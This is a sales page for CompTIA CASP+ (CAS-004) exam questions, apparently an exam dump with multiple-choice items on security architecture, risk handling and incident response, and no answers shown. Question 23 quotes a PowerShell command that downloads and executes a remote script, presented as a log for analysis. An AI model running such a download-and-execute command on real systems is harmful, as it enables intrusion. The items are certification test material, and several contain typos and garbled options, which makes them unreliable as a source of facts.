Special Summer Discounts Limited Time 55% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 63r59951

CAS-004 CompTIA Advanced Security Practitioner (CASP+) Exam Questions and Answers

Questions 4

An organization’s existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently,

the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.

Which of the following designs would be BEST for the CISO to use?

Options:

A.

Adding a second redundant layer of alternate vendor VPN concentrators

B.

Using Base64 encoding within the existing site-to-site VPN connections

C.

Distributing security resources across VPN sites

D.

Implementing IDS services with each VPN concentrator

E.

Transitioning to a container-based architecture for site-based services

Buy Now
Questions 5

A security analyst is reading the results of a successful exploit that was recently conducted by third-party penetration testers. The testers reverse engineered a privileged executable. In the report, the planning and execution of the exploit is detailed using logs and outputs from the test However, the attack vector of the exploit is missing, making it harder to recommend remediation’s. Given the following output:

CAS-004 Question 5

The penetration testers MOST likely took advantage of:

Options:

A.

A TOC/TOU vulnerability

B.

A plain-text password disclosure

C.

An integer overflow vulnerability

D.

A buffer overflow vulnerability

Buy Now
Questions 6

An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors. Which of the following categories BEST describes this type of vendor risk?

Options:

A.

SDLC attack

B.

Side-load attack

C.

Remote code signing

D.

Supply chain attack

Buy Now
Questions 7

A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment.

Which of the following should the security administrator do to mitigate the risk?

Options:

A.

Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement.

B.

Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management.

C.

Suggest that the networking team contact the original embedded system’s vendor to get an update to the system that does not require Flash.

D.

Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.

Buy Now
Questions 8

An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access.

Which of the following describes the administrator’s discovery?

Options:

A.

A vulnerability

B.

A threat

C.

A breach

D.

A risk

Buy Now
Questions 9

An organization is preparing to migrate its production environment systems from an on-premises environment to a cloud service. The lead security architect is concerned that the organization's current methods for addressing risk may not be possible in the cloud environment.

Which of the following BEST describes the reason why traditional methods of addressing risk may not be possible in the cloud?

Options:

A.

Migrating operations assumes the acceptance of all risk.

B.

Cloud providers are unable to avoid risk.

C.

Specific risks cannot be transferred to the cloud provider.

D.

Risks to data in the cloud cannot be mitigated.

Buy Now
Questions 10

A company’s employees are not permitted to access company systems while traveling internationally. The company email system is configured to block logins based on geographic location, but some employees report their mobile phones continue to sync email traveling . Which of the following is the MOST likely explanation? (Select TWO.)

Options:

A.

Outdated escalation attack

B.

Privilege escalation attack

C.

VPN on the mobile device

D.

Unrestricted email administrator accounts

E.

Chief use of UDP protocols

F.

Disabled GPS on mobile devices

Buy Now
Questions 11

A satellite communications ISP frequently experiences outages and degraded modes of operation over one of its legacy satellite links due to the use of deprecated hardware and software. Three days per week, on average, a contracted company must follow a checklist of 16 different high-latency commands that must be run in serial to restore nominal performance. The ISP wants this process to be automated.

Which of the following techniques would be BEST suited for this requirement?

Options:

A.

Deploy SOAR utilities and runbooks.

B.

Replace the associated hardware.

C.

Provide the contractors with direct access to satellite telemetry data.

D.

Reduce link latency on the affected ground and satellite segments.

Buy Now
Questions 12

The Chief information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices. Which of the following should the CIO implement to achieve this goal?

Options:

A.

BYOO

B.

CYOD

C.

COPE

D.

MDM

Buy Now
Questions 13

A security is assisting the marketing department with ensuring the security of the organization’s social media platforms. The two main concerns are:

The Chief marketing officer (CMO) email is being used department wide as the username

The password has been shared within the department

Which of the following controls would be BEST for the analyst to recommend?

Options:

A.

Configure MFA for all users to decrease their reliance on other authentication.

B.

Have periodic, scheduled reviews to determine which OAuth configuration are set for each media platform.

C.

Create multiple social media accounts for all marketing user to separate their actions.

D.

Ensue the password being shared is sufficiently and not written down anywhere.

Buy Now
Questions 14

Which of the following agreements includes no penalties and can be signed by two entities that are working together toward the same goal?

Options:

A.

MOU

B.

NDA

C.

SLA

D.

ISA

Buy Now
Questions 15

A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization’s headquarters location. The solution must also have the lowest power requirement on the CA.

Which of the following is the BEST solution?

Options:

A.

Deploy an RA on each branch office.

B.

Use Delta CRLs at the branches.

C.

Configure clients to use OCSP.

D.

Send the new CRLs by using GPO.

Buy Now
Questions 16

Given the following log snippet from a web server:

CAS-004 Question 16

Which of the following BEST describes this type of attack?

Options:

A.

SQL injection

B.

Cross-site scripting

C.

Brute-force

D.

Cross-site request forgery

Buy Now
Questions 17

An e-commerce company is running a web server on premises, and the resource utilization is usually less than 30%. During the last two holiday seasons, the server experienced performance issues because of too many connections, and several customers were not able to finalize purchase orders. The company is looking to change the server configuration to avoid this kind of performance issue.

Which of the following is the MOST cost-effective solution?

Options:

A.

Move the server to a cloud provider.

B.

Change the operating system.

C.

Buy a new server and create an active-active cluster.

D.

Upgrade the server with a new one.

Buy Now
Questions 18

An organization recently experienced a ransomware attack. The security team leader is concerned about the attack reoccurring. However, no further security measures have been implemented.

Which of the following processes can be used to identify potential prevention recommendations?

Options:

A.

Detection

B.

Remediation

C.

Preparation

D.

Recovery

Buy Now
Questions 19

A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the Jogs. the compromised workstation was observed connecting to multiple databases through ODBC. The following query behavior was captured:

CAS-004 Question 19

Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain?

A) Personal health information: Inform the human resources department of the breach and review the DLP logs.

В) Account history; Inform the relationship managers of the breach and create new accounts for the affected users.

C) Customer IDs: Inform the customer service department of the breach and work to change the account numbers.

D) PAN: Inform the legal department of the breach and look for this data in dark web monitoring.

Options:

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Buy Now
Questions 20

A threat hunting team receives a report about possible APT activity in the network.

Which of the following threat management frameworks should the team implement?

Options:

A.

NIST SP 800-53

B.

MITRE ATT&CK

C.

The Cyber Kill Chain

D.

The Diamond Model of Intrusion Analysis

Buy Now
Questions 21

SIMULATION

You are a security analyst tasked with interpreting an Nmap scan output from company’s privileged network.

The company’s hardening guidelines indicate the following:

There should be one primary server or service per device.

Only default ports should be used.

Non-secure protocols should be disabled.

INSTRUCTIONS

Using the Nmap output, identify the devices on the network and their roles, and any open ports that should be closed.

For each device found by Nmap, add a device entry to the Devices Discovered list, with the following information:

The IP address of the device

The primary server or service of the device (Note that each IP should by associated with one service/port only)

The protocol(s) that should be disabled based on the hardening guidelines (Note that multiple ports may need to be closed to comply with the hardening guidelines)

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

CAS-004 Question 21

CAS-004 Question 21

Options:

Buy Now
Questions 22

Company A acquired Company В. During an audit, a security engineer found Company B’s environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B's infrastructure could be integrated into Company A’s security program.

Which of the following risk-handling techniques was used?

Options:

A.

Accept

B.

Avoid

C.

Transfer

D.

Mitigate

Buy Now
Questions 23

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl ');whois

Which of the following security controls would have alerted and prevented the next phase of the attack?

Options:

A.

Antivirus and UEBA

B.

Reverse proxy and sandbox

C.

EDR and application approved list

D.

Forward proxy and MFA

Buy Now
Questions 24

The Chief information Officer (CIO) asks the system administrator to improve email security at the company based on the following requirements:

* Transaction being requested by unauthorized individuals.

* Complete discretion regarding client names, account numbers, and investment information.

* Malicious attackers using email to malware and ransomeware.

* Exfiltration of sensitive company information.

The cloud-based email solution will provide anti-malware reputation-based scanning, signature-based scanning, and sandboxing. Which of the following is the BEST option to resolve the boar’s concerns for this email migration?

Options:

A.

Data loss prevention

B.

Endpoint detection response

C.

SSL VPN

D.

Application whitelisting

Buy Now
Questions 25

A small business requires a low-cost approach to theft detection for the audio recordings it produces and sells.

Which of the following techniques will MOST likely meet the business’s needs?

Options:

A.

Performing deep-packet inspection of all digital audio files

B.

Adding identifying filesystem metadata to the digital audio files

C.

Implementing steganography

D.

Purchasing and installing a DRM suite

Buy Now
Questions 26

A security analyst discovered that the company’s WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:

CAS-004 Question 26

Which of the following would BEST mitigate this vulnerability?

Options:

A.

CAPTCHA

B.

Input validation

C.

Data encoding

D.

Network intrusion prevention

Buy Now
Questions 27

A company is outsourcing to an MSSP that performs managed detection and response services. The MSSP requires a server to be placed inside the network as a log aggregate and allows remote access to MSSP analyst. Critical devices send logs to the log aggregator, where data is stored for 12 months locally before being archived to a multitenant cloud. The data is then sent from the log aggregate to a public IP address in the MSSP datacenter for analysis.

A security engineer is concerned about the security of the solution and notes the following.

* The critical devise send cleartext logs to the aggregator.

* The log aggregator utilize full disk encryption.

* The log aggregator sends to the analysis server via port 80.

* MSSP analysis utilize an SSL VPN with MFA to access the log aggregator remotely.

* The data is compressed and encrypted prior to being achieved in the cloud.

Which of the following should be the engineer’s GREATEST concern?

Options:

A.

Hardware vulnerabilities introduced by the log aggregate server

B.

Network bridging from a remote access VPN

C.

Encryption of data in transit

D.

Multinancy and data remnants in the cloud

Buy Now
Questions 28

During a remodel, a company’s computer equipment was moved to a secure storage room with cameras positioned on both sides of the door. The door is locked using a card reader issued by the security team, and only the security team and department managers have access to the room. The company wants to be able to identify any unauthorized individuals who enter the storage room by following an authorized employee.

Which of the following processes would BEST satisfy this requirement?

Options:

A.

Monitor camera footage corresponding to a valid access request.

B.

Require both security and management to open the door.

C.

Require department managers to review denied-access requests.

D.

Issue new entry badges on a weekly basis.

Buy Now
Questions 29

A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM an downloaded the image to a secured USB drive to share with the government. Which of the following should be taken into consideration during the process of releasing the drive to the government?

Options:

A.

Encryption in transit

B.

Legal issues

C.

Chain of custody

D.

Order of volatility

E.

Key exchange

Buy Now
Questions 30

An analyst execute a vulnerability scan against an internet-facing DNS server and receives the following report:

CAS-004 Question 30

Which of the following tools should the analyst use FIRST to validate the most critical vulnerability?

Options:

A.

Password cracker

B.

Port scanner

C.

Account enumerator

D.

Exploitation framework

Buy Now
Questions 31

An application developer is including third-party background security fixes in an application. The fixes seem to resolve a currently identified security issue. However, when the application is released to the public, report come In that a previously vulnerability has returned. Which of the following should the developer integrate into the process to BEST prevent this type of behavior?

Options:

A.

Peer review

B.

Regression testing

C.

User acceptance

D.

Dynamic analysis

Buy Now
Questions 32

A security engineer estimates the company’s popular web application experiences 100 attempted breaches per day. In the past four years, the company’s data has been breached two times.

Which of the following should the engineer report as the ARO for successful breaches?

Options:

A.

0.5

B.

8

C.

50

D.

36,500

Buy Now
Questions 33

As part of the customer registration process to access a new bank account, customers are required to upload a number of documents, including their passports and driver’s licenses. The process also requires customers to take a current photo of themselves to be compared against provided documentation.

Which of the following BEST describes this process?

Options:

A.

Deepfake

B.

Know your customer

C.

Identity proofing

D.

Passwordless

Buy Now
Questions 34

A company Is adopting a new artificial-intelligence-based analytics SaaS solution. This Is the company's first attempt at using a SaaS solution, and a security architect has been asked to determine any future risks. Which of the following would be the GREATEST risk In adopting this solution?

Options:

A.

The inability to assign access controls to comply with company policy

B.

The inability to require the service provider process data in a specific country

C.

The inability to obtain company data when migrating to another service

D.

The inability to conduct security assessments against a service provider

Buy Now
Exam Code: CAS-004
Exam Name: CompTIA Advanced Security Practitioner (CASP+) Exam
Last Update: Aug 17, 2022
Questions: 231

PDF + Testing Engine

$79.2  $175.99

Testing Engine

$59.4  $131.99
buy now CAS-004 testing engine

PDF (Q&A)

$49.5  $109.99
buy now CAS-004 pdf